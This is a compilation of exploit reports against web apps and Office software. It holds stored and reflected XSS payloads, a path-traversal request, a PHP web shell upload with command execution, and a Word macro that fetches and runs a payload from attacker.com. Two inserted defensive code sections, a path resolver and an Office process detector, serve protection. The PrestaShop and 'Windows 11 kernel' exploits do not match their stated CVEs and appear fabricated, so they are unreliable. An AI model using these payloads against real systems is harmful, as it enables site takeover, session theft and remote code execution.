<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://onesttech.com/details/crm │<br />│ Vendor : Onest Tech │<br />│ Software : ONEST CRM 1.0 - Customer Relationship Management System Software │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL, MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />------------------------------------------------------------<br />POST /admin/project/update/2 HTTP/2<br /><br />Content-Disposition: form-data; name="name"<br /><br /><script>alert(1)</script><br />------------------------------------------------------------<br /><br />POST parameter 'name' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. Login (as Client) "Normal User"<br />2. Go to [Project List] on this Path (https://website/admin/project)<br />3. Select any Project, click on the ... then select [Edit]<br />4. Inject your [XSS Payload] in "Name"<br />5. Scroll down and press [Update]<br />6. XSS will fire in the Client browser<br /><br />7. When the ADMIN visits the [Project List] to check the projects on this Path (https://website/admin/project) in the administration panel<br />8. XSS will fire and execute in the ADMIN's browser<br /><br />Note: the path for [Client Users] and [ADMIN] looks the same on "/admin/",<br /> but the Client User panel is limited and does not show all Administration MENU options of the administration panel used to manage the website<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Office Suite Premium 10.9.1.42602 - Local File Inclusion <br /># Date: 06-26-2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.mobisystems.com/<br /># Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506<br /># Version: Office Suite Premium 10.9.1.42602<br /># Tested on: Ubuntu 18.04<br /><br /><br /># POC<br /><br />GET /../../../../../../../../../../../../../../../etc/hosts HTTP/2<br />Host: connect.mobisystems.com<br />Accept: */*<br />Clv: 42602<br />Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free<br />Accept-Language: tr-TR,tr;q=0.9<br />Accept-Encoding: gzip, deflate<br />App: com.mobisystems.ios.office.free<br />User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0<br />Gdpr: true<br />Account: 234c89ff-7e80-4b64-9d35-8653fe131795<br />Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19<br /><br />Result : <br /><br />127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine <br /><br />Url: https://connect.mobisystems.com/etc/hosts<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Office Suite Premium 10.9.1.42602 - Path Traversal<br /># Date: 06-26-2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.mobisystems.com/<br /># Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506<br /># Version: Office Suite Premium 10.9.1.42602<br /># Tested on: Ubuntu 18.04<br /><br /><br /># POC<br /><br />GET /../../../../../../../../../../../../../../../etc/hosts HTTP/2<br />Host: connect.mobisystems.com<br />Accept: */*<br />Clv: 42602<br />Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free<br />Accept-Language: tr-TR,tr;q=0.9<br />Accept-Encoding: gzip, deflate<br />App: com.mobisystems.ios.office.free<br />User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0<br />Gdpr: true<br />Account: 234c89ff-7e80-4b64-9d35-8653fe131795<br />Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19<br /><br />Result : <br /><br />127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine <br /><br />Url: https://connect.mobisystems.com/etc/hosts<br /><br /><br /><br /></code></pre>
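<p>Both Office Suite reports above show the same request: a path made of repeated <code>../</code> segments that the server resolved to <code>/etc/hosts</code> (the <code>Url:</code> line shows the collapsed result). The function below is an added example, not the vendor's code, showing how a file-serving endpoint should map a request path onto its document root and refuse anything that climbs above it; it also covers the percent-encoded and backslash variants the reports do not show. <code>DOC_ROOT</code> is an assumed value.</p>

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Directory the endpoint may serve from. Assumed value for this example.
DOC_ROOT = "/srv/static"


def _decode_fully(path: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (%252e%252e -> %2e%2e -> ..)."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def resolve_within_root(requested: str, root: str = DOC_ROOT) -> Optional[str]:
    """Map a request path onto a file below ``root``.

    Returns the absolute path if the request stays inside the root, or None
    if any ".." segment tries to climb above it. The walk is done by hand
    because posixpath.normpath("/../../etc/hosts") silently yields "/etc/hosts",
    which is exactly the lenient behaviour the reports above rely on.
    """
    path = requested.split("?", 1)[0]     # the query string is not part of the path
    path = _decode_fully(path)
    path = path.replace("\\", "/")        # a "..\" segment must count as traversal too
    if "\x00" in path:
        return None                       # NUL would truncate the name in C-level APIs
    parts = []
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not parts:
                return None               # attempt to go above the root
            parts.pop()
            continue
        parts.append(segment)
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, *parts))
    # Belt and braces: the result must be the root itself or something under it.
    # (Symlinks under the root are a separate concern; resolve with os.path.realpath
    # before opening if they can exist.)
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # The request from the reports above plus encoded, backslash and benign variants.
    for req in ("/../../../../../../../../../../../../../../../etc/hosts",
                "/%2e%2e/%2e%2e/etc/passwd",
                "/..\\..\\etc\\hosts",
                "/css/../images/logo.png"):
        print(f"{req!r:62} -> {resolve_within_root(req)}")
```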
<pre><code># Exploit Title: Office Suite Premium 10.9.1.42602 - Cross-Site Scripting (reflected)<br /># Date: 06-26-2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.mobisystems.com/<br /># Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506<br /># Version: Office Suite Premium 10.9.1.42602<br /># Tested on: Ubuntu 18.04<br /><br /><br /># POC<br /># Exploit Details : Following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.<br /><br />Request 1: <br /><br />GET /api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code HTTP/2<br />Host: connect.mobisystems.com<br />Accept: */*<br />Clv: 42602<br />Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free<br />Accept-Language: en_EN,en;q=0.9<br />Accept-Encoding: gzip, deflate<br />App: com.mobisystems.ios.office.free<br />User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0<br />Gdpr: true<br />Account: 234c89ff-7e80-4b64-9d35-8653fe131795<br />Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19<br /><br />Url: https://connect.mobisystems.com/api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code<br />Payload: <img src=a onerror=alert(1)><br />Parameter : application<br /><br /><br />Request 2 : <br /><br />GET /api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 HTTP/2<br />Host: connect.mobisystems.com<br />Accept: */*<br />Clv: 42602<br />Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free<br />Accept-Language: en_EN,en;q=0.9<br />Accept-Encoding: gzip, deflate<br />App: com.mobisystems.ios.office.free<br />User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0<br />Lang: en_EN<br />Gdpr: 
true<br />Account: 234c89ff-7e80-4b64-9d35-8653fe131795<br />Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19<br /><br />URL : https://connect.mobisystems.com/api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527<br />Payload : <img src=a onerror=alert(1)><br />Parameter: id<br /><br />Request 3 : <br /><br />GET /api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search HTTP/2<br />Host: connect.mobisystems.com<br />Accept: */*<br />Clv: 42602<br />Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free<br />Accept-Language: en_EN,en;q=0.9<br />Accept-Encoding: gzip, deflate<br />App: com.mobisystems.ios.office.free<br />User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0<br />Lang: en_EN<br />Gdpr: true<br />Account: 234c89ff-7e80-4b64-9d35-8653fe131795<br />Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19<br /><br />URL : https://connect.mobisystems.com/api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search<br />Payload :<img src=a onerror=alert(1)><br />Parameter: filter<br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://magicai.liquid-themes.com/ │<br />│ Vendor : MagicAI │<br />│ Software : MagicAI 1.55R │<br />│ Vuln Type: Stored XSS via File Upload │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Steps to Reproduce:<br /><br />1. Go to [Settings] on this Path (https://website/dashboard/user/settings)<br />2. 
Upload any Image in Avatar to capture the request in Burp Suite<br />3. Replace image.png with image.svg in [filename] and add this SVG with HTML Included<br /><br />----------------------------------------------------------------------------------------<br />POST /dashboard/user/settings/save HTTP/2<br /><br />Content-Disposition: form-data; name="avatar"; filename="image.svg"<br />Content-Type: image/png<br /><br /><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105"><br /><html><head><title>test</title></head><body><script>alert('xss');</script></body></html><br /></svg><br />----------------------------------------------------------------------------------------<br /><br />4. Send the Request<br />5. Back to the Path (https://website/dashboard/user/settings)<br />6. Refresh the Page<br />7. Capture the Link of your Uploaded svg in [Burp Logger] GET (https://website/upload/images/avatar/****-culote-mia-avatar.svg)<br />8. Send SVG Link to Victims<br />9. XSS Executed!<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074)<br />64-bit Remote Code Execution Vulnerability<br />## Author: nu11secur1ty<br />## Date: 04.17.2023<br />## Vendor: https://www.microsoft.com/<br />## Software: https://www.microsoft.com/en-us/microsoft-365/<br />## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/<br />## CVE-2023-28285<br /><br /><br />## Description:<br />The attack itself is carried out locally by a user with authentication<br />to the targeted system. An attacker could exploit the vulnerability by<br />convincing a victim, through social engineering, to download and open<br />a specially crafted file from a website which could lead to a local<br />attack on the victim's computer. The attacker can trick the victim into<br />opening a malicious web page by using a malicious `Word` file for the<br />`Office-365 API`. After the user opens the file to read it, from<br />the API of Office-365, without being asked what it wants to activate,<br />etc., he will activate the code of the malicious server, which he will<br />inject himself, from this malicious server. Immediately after this<br />click, the attacker can receive very sensitive information! 
For bank<br />accounts, logs from some sniff attacks, tracking of all the traffic of<br />the victim without stopping, and more malicious stuff; it depends on<br />the scenario, etc.<br />STATUS: HIGH Vulnerability<br /><br />[+]Exploit:<br />The exploit server must be BROADCASTING at the moment when the victim<br />hits the button of the exploit!<br /><br />[+]PoC:<br />```cmd<br />Sub AutoOpen()<br /> Call Shell("cmd.exe /S /c" & "curl -s<br />http://attacker.com/CVE-2023-28285/PoC.debelui | debelui",<br />vbNormalFocus)<br />End Sub<br />```<br /><br />## FYI:<br />The PoC has a price and this report will be uploaded with a<br />description and video of how you can reproduce it only.<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)<br /><br />## Proof and Exploit<br />[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)<br /><br />## Time spent:<br />01:30:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
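<p>The PoC above is an AutoOpen macro that has Word spawn <code>cmd.exe</code>, fetch something with <code>curl</code> and pipe it into another program; whatever the payload, that parent/child relationship is what endpoint telemetry shows. The following is an added detection example, not part of the author's report: it classifies constructed process-creation records (Sysmon Event ID 1 field names; hosts, users and URLs are invented) and flags an Office process that starts a shell or download tool, with the piped download as the highest-confidence case.</p>

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields.
# They are samples for this example, not telemetry from any real host.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"User": "CORP\\alice",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /S /c curl -s http://attacker.example/PoC.debelui | debelui"},
    {"User": "CORP\\alice",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"User": "CORP\\bob",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c curl -s https://example.org/"},
    {"User": "CORP\\carol",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -enc AAAAAAAA"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
# Download tooling named on a shell's command line ("\b" keeps curl from matching curly).
DOWNLOAD_RE = re.compile(r"\b(curl|wget|certutil|bitsadmin|invoke-webrequest|iwr|downloadstring)\b", re.I)
# Output of the download handed to another program, as in the macro above.
PIPE_RE = re.compile(r"\|\s*\S+")
# PowerShell accepts any prefix of -EncodedCommand ("-e", "-ec", "-enc", ...).
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:ncodedcommand|nc|c)?(?:\s|$)", re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return an alert for an Office process spawning a shell/downloader, else None."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent not in OFFICE_PARENTS:
        return None
    rule, severity = None, None
    if child in DOWNLOADERS:
        rule, severity = "office_spawns_downloader", "high"
    elif child in SHELLS:
        if DOWNLOAD_RE.search(cmd) and PIPE_RE.search(cmd):
            rule, severity = "office_shell_download_piped", "high"
        elif DOWNLOAD_RE.search(cmd):
            rule, severity = "office_shell_download", "high"
        elif ENCODED_RE.search(cmd):
            rule, severity = "office_shell_encoded", "high"
        else:
            rule, severity = "office_spawns_shell", "medium"
    if rule is None:
        return None  # e.g. the print-spooler helper Office starts legitimately
    return {"rule": rule, "severity": severity, "user": event.get("User", ""),
            "parent": parent, "child": child, "command": cmd}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run classify() over a batch of records and keep only the hits."""
    return [alert for alert in (classify(e) for e in events) if alert]


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['rule']}: {a['user']} {a['parent']} -> {a['child']}: {a['command']}")
```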
<pre><code># Exploit Title: MyBB [PGM] Favicon Plugin 1.0 - Cross-Site Scripting<br /># Date: May 2, 2023<br /># Author: 0xB9<br /># Twitter: @0xB9sec<br /># Software Link: https://community.mybb.com/mods.php?action=view&pid=1554<br /># Version: 1.0<br /># Tested On: Windows 10<br /><br />Description:<br /><br />The favicon input in the settings doesn't sanitize the favicon URL.<br /><br />Proof of Concept:<br /><br />- In the admin dashboard go to Configuration > Settings > Favicon<br />- Enter the following payload in the URL input: "><script>alert(1)</script>.ico<br />- Visit any page on the forum to trigger the payload<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://demo.smartwebinfotech.site/job-board/ │<br />│ Vendor : Smartweb Infotech │<br />│ Software : Job Board 1.0 - Job Portal Management System │<br />│ Vuln Type: Arbitrary File Upload Leads to RCE │<br />│ Impact : Upload PHPshell and execute commands on the server │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Allow Attacker to overwrite critical files simply by uploading a shell and execute │<br />│ commands on the server │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Steps to Reproduce:<br /><br />1. 
Go to [My Profile] on this Path (https://website/settings/account)<br />2. Upload any Image to capture the request in Burp Suite<br />3. Replace image.png with upload.php in [filename] and add this simple PHP shell<br /><br />POST /job-board/settings/account HTTP/2<br /><br />-----------------------------427088175318086545183087924022<br />Content-Disposition: form-data; name="profile"; filename="shell.php"<br />Content-Type: image/png<br /><br /><?php echo system($_GET['command']); ?><br />-----------------------------427088175318086545183087924022--<br /><br />4. Send the Request<br />5. Back to the Path (https://website/settings/account)<br />6. Refresh the Page<br />7. Copy the Link of (Unloaded Image)<br />8. Paste the Link of your uploaded PHP shell - Path (https://website/storage/upload/profile/shell_1687559183.php?command=id)<br />9. RCE Executed!<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory<br /># Date: 2023-06-20<br /># Dork: /modules/winbizpayment/downloads/download.php<br /># country: Iran<br /># Exploit Author: Amirhossein Bahramizadeh<br /># Category : webapps<br /># Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html<br /># Version: 17.1.3 (REQUIRED)<br /># Tested on: Windows/Linux<br /># CVE : CVE-2023-30198<br /><br />import requests<br />import string<br />import random<br /><br /># The base URL of the vulnerable site<br />base_url = "http://example.com"<br /><br /># The URL of the login page<br />login_url = base_url + "/authentication.php"<br /><br /># The username and password for the admin account<br />username = "admin"<br />password = "password123"<br /><br /># The URL of the vulnerable download.php file<br />download_url = base_url + "/modules/winbizpayment/downloads/download.php"<br /><br /># The ID of the order to download<br />order_id = 1234<br /><br /># The path to save the downloaded file<br />file_path = "/tmp/order_%d.pdf" % order_id<br /><br /># The session cookies to use for the requests<br />session_cookies = None<br /><br /># Generate a random string for the CSRF token<br />csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))<br /><br /># Send a POST request to the login page to authenticate as the admin user<br />login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}<br />session = requests.Session()<br />response = session.post(login_url, data=login_data)<br /><br /># Save the session cookies for future requests<br />session_cookies = session.cookies.get_dict()<br /><br /># Generate a random string for the CSRF token<br />csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))<br /><br /># Send a POST request to the download.php file to download the order PDF<br 
/>download_data = {"id_order": order_id, "csrf_token": csrf_token}<br />response = session.post(download_url, cookies=session_cookies, data=download_data)<br /><br /># Save the downloaded file to disk<br />with open(file_path, "wb") as f:<br /> f.write(response.content)<br /><br /># Print a message indicating that the file has been downloaded<br />print("File downloaded to %s" % file_path)<br /> <br /><br /></code></pre>
<pre><code>// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation<br />// Date: 2023-06-20<br />// country: Iran<br />// Exploit Author: Amirhossein Bahramizadeh<br />// Category : webapps<br />// Vendor Homepage:<br />// Tested on: Windows/Linux<br />// CVE : CVE-2023-28293<br /><br />#include <windows.h><br />#include <stdio.h><br />#include <string.h> // memset<br /><br />// Forward declarations: both helpers are defined below main().<br />// Build as a non-UNICODE (ANSI) project, since the names below are narrow<br />// strings passed to LPCTSTR parameters.<br />BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name);<br />BOOL UnloadDriver(LPCTSTR service_name);<br /><br />// The vulnerable driver file name<br />const char *driver_name = "vuln_driver.sys";<br /><br />// The vulnerable driver device name<br />const char *device_name = "\\\\.\\VulnDriver";<br /><br />// The IOCTL code to trigger the vulnerability<br />#define IOCTL_VULN_CODE 0x222003<br /><br />// The buffer size for the IOCTL input/output data<br />#define IOCTL_BUFFER_SIZE 0x1000<br /><br />int main()<br />{<br /> HANDLE device;<br /> DWORD bytes_returned = 0;<br /> char input_buffer[IOCTL_BUFFER_SIZE];<br /> char output_buffer[IOCTL_BUFFER_SIZE];<br /><br /> // Load the vulnerable driver<br /> if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))<br /> {<br /> printf("Error loading vulnerable driver: %lu\n", GetLastError());<br /> return 1;<br /> }<br /><br /> // Open the vulnerable driver device<br /> device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);<br /> if (device == INVALID_HANDLE_VALUE)<br /> {<br /> printf("Error opening vulnerable driver device: %lu\n", GetLastError());<br /> return 1;<br /> }<br /><br /> // Fill the input buffer with data to trigger the vulnerability<br /> memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);<br /><br /> // Send the IOCTL to trigger the vulnerability<br /> if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))<br /> {<br /> printf("Error sending IOCTL: %lu\n", GetLastError());<br /> return 1;<br /> }<br /><br /> // Print the output buffer contents, bounded by what the driver actually<br /> // returned (the buffer is not guaranteed to be NUL-terminated)<br /> printf("Output buffer:\n%.*s\n", (int)bytes_returned, output_buffer);<br /><br /> // Unload the vulnerable driver<br /> 
if (!UnloadDriver("\\Driver\\VulnDriver"))<br /> {<br /> printf("Error unloading vulnerable driver: %d\n", GetLastError());<br /> return 1;<br /> }<br /><br /> // Close the vulnerable driver device<br /> CloseHandle(device);<br /><br /> return 0;<br />}<br /><br />BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)<br />{<br /> SC_HANDLE sc_manager, service;<br /> DWORD error;<br /><br /> // Open the Service Control Manager<br /> sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);<br /> if (sc_manager == NULL)<br /> {<br /> return FALSE;<br /> }<br /><br /> // Create the service<br /> service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);<br /> if (service == NULL)<br /> {<br /> error = GetLastError();<br /> if (error == ERROR_SERVICE_EXISTS)<br /> {<br /> // The service already exists, so open it instead<br /> service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);<br /> if (service == NULL)<br /> {<br /> CloseServiceHandle(sc_manager);<br /> return FALSE;<br /> }<br /> }<br /> else<br /> {<br /> CloseServiceHandle(sc_manager);<br /> return FALSE;<br /> }<br /> }<br /><br /> // Start the service<br /> if (!StartService(service, 0, NULL))<br /> {<br /> error = GetLastError();<br /> if (error != ERROR_SERVICE_ALREADY_RUNNING)<br /> {<br /> CloseServiceHandle(service);<br /> CloseServiceHandle(sc_manager);<br /> return FALSE;<br /> }<br /> }<br /><br /> CloseServiceHandle(service);<br /> CloseServiceHandle(sc_manager);<br /> return TRUE;<br />}<br /><br />BOOL UnloadDriver(LPCTSTR service_name)<br />{<br /> SC_HANDLE sc_manager, service;<br /> SERVICE_STATUS status;<br /> DWORD error;<br /><br /> // Open the Service Control Manager<br /> sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);<br /> if (sc_manager == NULL)<br /> {<br /> return FALSE;<br /> }<br /><br /> // Open the service<br 
/> service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);<br /> if (service == NULL)<br /> {<br /> CloseServiceHandle(sc_manager);<br /> return FALSE;<br /> }<br /><br /> // Stop the service<br /> if (!ControlService(service, SERVICE_CONTROL_STOP, &status))<br /> {<br /> error = GetLastError();<br /> if (error != ERROR_SERVICE_NOT_ACTIVE)<br /> {<br /> CloseServiceHandle(service);<br /> CloseServiceHandle(sc_manager);<br /> return FALSE;<br /> }<br /> }<br /><br /> // Delete the service<br /> if (!DeleteService(service))<br /> {<br /> CloseServiceHandle(service);<br /> CloseServiceHandle(sc_manager);<br /> return FALSE;<br /> }<br /><br /> CloseServiceHandle(service);<br /> CloseServiceHandle(sc_manager);<br /> return TRUE;<br />}<br /> <br /><br /></code></pre>